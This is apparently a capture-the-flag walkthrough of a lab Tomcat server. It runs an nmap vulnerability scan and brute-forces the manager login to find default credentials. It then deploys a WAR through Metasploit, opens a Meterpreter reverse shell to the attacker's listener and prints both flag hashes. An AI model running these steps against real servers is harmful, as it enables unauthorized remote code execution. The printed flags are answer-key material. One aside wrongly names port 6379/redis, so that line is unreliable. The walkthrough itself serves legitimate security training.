root@htb:~$sudonmap--script=vuln10.129.136.9-p8080PORTSTATESERVICE8080/tcpopenhttp-proxy|http-slowloris-check:|VULNERABLE:|SlowlorisDOSattack|State:LIKELYVULNERABLE|IDs:CVE:CVE-2007-6750|Slowloristriestokeepmanyconnectionstothetargetwebserveropenandhold|themopenaslongaspossible.Itaccomplishesthisbyopeningconnectionsto|thetargetwebserverandsendingapartialrequest.Bydoingso,itstarves|thehttpserver's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /examples/: Sample scripts | /manager/html/upload: Apache Tomcat (401 Unauthorized) | /manager/html: Apache Tomcat (401 Unauthorized) |_ /docs/: Potentially interesting folder * the --script=vuln will run scripts that focus specifically on detecting known vulnerabilities in the service running on port 6379 - e.g., weak configurations, or known vulnerabilities in the redis service - if no results are found then the service may be fully patched!
FOOTHOLD
Submit the flag located on the user's desktop and the flag located on the administrator's desktop.
//walk the application
root@htb:~$ BROWSER > http://10.129.136.9:8080
* identified the following
- default tomcat configuration
- Manager App Button leads to a "Basic HTTP Authentication"
- Host Manager Button leads to a "Basic HTTP Authentication"
//
root@htb:~$ msfconsole
[msf] >> search tomcat
64 auxiliary/scanner/http/tomcat_mgr_login . normal No Tomcat Application Manager Login Utility
[msf] >> use 64
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> show options
...
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> set RHOSTS 10.129.136.9
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> run
...
[+] 10.129.136.9:8080 - Login Successful: tomcat:s3cret
...
root@htb:~$ BROWSER > http://10.129.136.9:8080 > Manager App
Username: tomcat
Password: s3cret
* upload a WAR file
- A WAR file is a packaged Java web application. It contains:
HTML/JSP files, Java servlets, Compiled .class files,
Configuration files like web.xml, Static content (CSS, JS, images),
even reverse shells
- WAR files are deployed to Java servlet containers like Tomcat, allowing
apps to run in a browser via HTTP
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> search tomcat_mgr
5 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> use 5
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 85.9.192.83 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set HttpPassword s3cret
HttpPassword => s3cret
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set HttpUsername tomcat
HttpUsername => tomcat
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set RHOSTS 10.129.136.9
RHOSTS => 10.129.136.9
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set RPORT 8080
RPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set LHOST 10.10.14.4
LHOST => 10.10.14.4
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set LPORT 31337
LPORT => 31337
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> exploit
[*] Started reverse TCP handler on 10.10.14.4:31337
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying TBD3o7ivnHSaUWmP...
[*] Executing TBD3o7ivnHSaUWmP...
[*] Undeploying TBD3o7ivnHSaUWmP ...
[*] Undeployed at /manager/html/undeploy
[*] Sending stage (58073 bytes) to 10.129.136.9
[*] Meterpreter session 1 opened (10.10.14.4:31337 -> 10.129.136.9:49192) at 2025-08-03 19:47:40 -0500
(Meterpreter 1)(C:\apache-tomcat-7.0.88) >
C:\apache-tomcat-7.0.88> dir c:\users
06/18/2018 11:31 PM <DIR> Administrator
08/22/2013 06:39 PM <DIR> Public
C:\apache-tomcat-7.0.88> dir c:\users\administrator\Desktop
06/19/2018 07:09 AM <DIR> flags
C:\apache-tomcat-7.0.88>dir c:\users\administrator\desktop\flags
06/19/2018 07:11 AM 88 2 for the price of 1.txt
C:\apache-tomcat-7.0.88>type "c:\users\administrator\desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
